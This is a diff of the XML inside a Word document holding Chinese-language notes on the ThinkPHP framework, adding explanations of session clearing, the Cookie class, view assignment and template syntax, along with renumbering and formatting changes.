+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>下面的值</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="145" w:left="304"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Session::clear('think');</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">// </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>清除</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>think</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>作用域</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>session</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="6441" w:type="dxa"/>
           </w:tcPr>
-          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>C</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>ookie</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>类</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="45D9A4E1" wp14:editId="49972308">
+                  <wp:simplePos x="0" y="0"/>
+                  <wp:positionH relativeFrom="column">
+                    <wp:align>right</wp:align>
+                  </wp:positionH>
+                  <wp:positionV relativeFrom="paragraph">
+                    <wp:posOffset>18821400</wp:posOffset>
+                  </wp:positionV>
+                  <wp:extent cx="1493520" cy="2353945"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="8255"/>
+                  <wp:wrapSquare wrapText="bothSides"/>
+                  <wp:docPr id="22" name="图片 22"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId20">
+                            <a:extLst>
+                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                              </a:ext>
+                            </a:extLst>
+                          </a:blip>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="1494000" cy="2354400"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                  <wp14:sizeRelH relativeFrom="margin">
+                    <wp14:pctWidth>0</wp14:pctWidth>
+                  </wp14:sizeRelH>
+                  <wp14:sizeRelV relativeFrom="margin">
+                    <wp14:pctHeight>0</wp14:pctHeight>
+                  </wp14:sizeRelV>
+                </wp:anchor>
+              </w:drawing>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>1</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）初始化</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>// cookie</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>初始化</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="150" w:firstLine="315"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Cookie::init(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>配置</w:t>
+            </w:r>
+            <w:r>
+              <w:t>参数</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>]);</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>支持</w:t>
+            </w:r>
+            <w:r>
+              <w:t>的参数</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>如右边</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）存取数据</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t>Set,get,delete,clear</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>方法</w:t>
+            </w:r>
+            <w:r>
+              <w:t>是用和</w:t>
+            </w:r>
+            <w:r>
+              <w:t>session</w:t>
+            </w:r>
+            <w:r>
+              <w:t>一致</w:t>
+            </w:r>
+            <w:r>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>不支持</w:t>
+            </w:r>
+            <w:r>
+              <w:t>作用域</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>)</w:t>
+            </w:r>
+            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+            <w:bookmarkEnd w:id="0"/>
+          </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
@@ -3655,7 +4616,16 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve">2.1 </w:t>
+        <w:t>2.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4533,7 +5503,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId20"/>
+                          <a:blip r:embed="rId21"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -4599,7 +5569,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId21"/>
+                          <a:blip r:embed="rId22"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -4858,7 +5828,10 @@
         <w:t>2</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">.2 </w:t>
+        <w:t>.3</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5538,7 +6511,16 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve">2.3 </w:t>
+        <w:t>2.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5730,11 +6712,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -5781,11 +6758,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:noProof/>
@@ -5806,7 +6778,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId22"/>
+                          <a:blip r:embed="rId23"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -5833,11 +6805,6 @@
             <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -5887,7 +6854,6 @@
             <w:pPr>
               <w:ind w:firstLine="420"/>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -5901,7 +6867,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:b/>
               </w:rPr>
             </w:pPr>
@@ -5933,9 +6898,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -5944,7 +6906,10 @@
         <w:t>2</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">.4 </w:t>
+        <w:t>.5</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5964,8 +6929,8 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="6437"/>
-        <w:gridCol w:w="6441"/>
+        <w:gridCol w:w="6422"/>
+        <w:gridCol w:w="6456"/>
         <w:gridCol w:w="6441"/>
       </w:tblGrid>
       <w:tr>
@@ -6036,11 +7001,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -6057,7 +7017,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -6096,7 +7055,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -6250,11 +7208,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -6289,7 +7242,6 @@
             <w:pPr>
               <w:ind w:firstLineChars="200" w:firstLine="420"/>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -6381,7 +7333,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId23"/>
+                          <a:blip r:embed="rId24"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -6402,13 +7354,7 @@
               </w:drawing>
             </w:r>
           </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
+          <w:p/>
         </w:tc>
         <w:tc>
           <w:tcPr>
@@ -6462,26 +7408,180 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    // </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>实例化视图类</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$view = new \think\View();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$view-&gt;assign([</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    'name'=&gt;'ThinkPHP',</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    'email'=&gt;'thinkphp@qq.com'</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    ]);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> // </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>模板输出</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>return $view-&gt;fetch('index');</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t>view</w:t>
+            </w:r>
+            <w:r>
+              <w:t>对象直接赋值</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
               </w:rPr>
               <w:t xml:space="preserve">// </w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
               </w:rPr>
               <w:t>实例化视图类</w:t>
             </w:r>
@@ -6511,7 +7611,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>$view-&gt;assign([</w:t>
+              <w:t>$view-&gt;name =   'ThinkPHP';</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6525,181 +7625,13 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">    'name'=&gt;'ThinkPHP',</w:t>
+              <w:t>$view-&gt;email=   'thinkphp@qq.com';</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:leftChars="200" w:left="420"/>
               <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    'email'=&gt;'thinkphp@qq.com'</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:leftChars="200" w:left="420"/>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    ]);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:leftChars="200" w:left="420"/>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> // </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>模板输出</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:leftChars="200" w:left="420"/>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>return $view-&gt;fetch('index');</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>（</w:t>
-            </w:r>
-            <w:r>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:t>）</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:t>view</w:t>
-            </w:r>
-            <w:r>
-              <w:t>对象直接赋值</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t xml:space="preserve">   </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">// </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>实例化视图类</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:leftChars="200" w:left="420"/>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>$view = new \think\View();</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:leftChars="200" w:left="420"/>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>$view-&gt;name =   'ThinkPHP';</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:leftChars="200" w:left="420"/>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>$view-&gt;email=   'thinkphp@qq.com';</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:leftChars="200" w:left="420"/>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -6831,20 +7763,29 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
               </w:rPr>
               <w:t xml:space="preserve">{ </w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
               </w:rPr>
               <w:t>和</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> } </w:t>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve"> }</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6867,11 +7808,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -6899,20 +7835,29 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
               </w:rPr>
               <w:t xml:space="preserve">{ </w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
               </w:rPr>
               <w:t>和</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> } </w:t>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve"> }</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6946,11 +7891,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -6975,8 +7915,6 @@
             <w:r>
               <w:t>：</w:t>
             </w:r>
-            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-            <w:bookmarkEnd w:id="0"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -7014,7 +7952,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -7058,7 +7995,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -7102,7 +8038,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -7167,7 +8102,6 @@
             <w:pPr>
               <w:jc w:val="left"/>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -7195,13 +8129,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>" id="row"}</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  //volist</w:t>
+              <w:t>" id="row"}  //volist</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7477,6 +8405,31 @@
               </w:rPr>
               <w:t>",$result);</w:t>
             </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> //</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>assign</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>赋值给</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>array</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -7509,16 +8462,1925 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
